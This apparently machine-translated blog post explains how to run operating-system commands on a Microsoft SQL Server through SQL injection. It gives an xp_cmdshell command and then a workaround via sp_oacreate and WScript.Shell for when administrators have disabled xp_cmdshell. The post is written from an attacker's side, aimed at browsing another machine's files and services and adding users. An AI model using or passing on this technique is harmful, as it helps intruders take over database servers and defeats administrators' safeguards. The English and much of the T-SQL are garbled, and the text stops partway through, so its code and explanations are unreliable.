There is an article in my blog, introduces the basic principles and some methods about SQL injection. The most interested interest may be a console command to run the operating system using the extended stored procedure xp_cmdshell. This method is also very simple, just use the following SQL statement: exec master.dbo.xp_cmdshell 'DIR C: /' But more and more database administrators have realized potential dangers of this extended stored procedure, they may You will delete or change the dynamic link library XPLog70.dll file of the stored procedure. At this time, many people may give up because we can't run any CMD commands, it is difficult to view the files, directories, and open services of the other computer. And NT users cannot be added. I have studied this, and later I found that even if xp_cmdshell is not available, it is possible to run the CMD on the server and get the result of the result. Here you need to use several system stored procedures for SQL servers: sp_oacreate, sp_oAgetProperty and SP_OAMETHOD. The premise is Wscript.Shell and scripting.FileSystemObject on the server available. Sp_oacreate creates an OLE object instance on the Microsoft® SQL ServerTM instance. Syntax sp_oacreate progid, | clsid, objectToken Output [, context] sp_oagetProperty Gets the properties value of the OLE object. Syntax sp_oagetproperty ObjectToken, PropertyName [, PropertyValue Output] [, index ...] sp_oamethod Call the OLE object. Syntax sp_oamethod ObjectToken, MethodName [, ReturnValue Output] [, [@ParameterName =] Parameter [output] [... n]] think: first build a WScript.Shell on SQL Server, call it Run Method, cmd.exe The result of the execution is output to a file, then build a scripting.filesystemObject, build a TextStream object, read the characters in the temporary file, and the one line is added to a temporary table. The following are the appropriate SQL statements CREATE TABLE mytmp (info VARCHAR (400), ID IDENTITY (1, 1) NOT NULL) DECLARE @shell INTDECLARE @fso INTDECLARE @file INTDECLARE @isEnd BITDECLARE @out VARCHAR (400) EXEC sp_oacreate 'wscript. Shell ', @ shell outputexec sp_oamethod @ shell,' run ', null,' cmd.exe / c Dir C: /> C: /TEMP.TXT ',' 0 ',' TRUE '- Note Run's parameter TRUE This parameter must be used for the result of the wait for the run, and this parameter must be used for a long time command similar to PING.
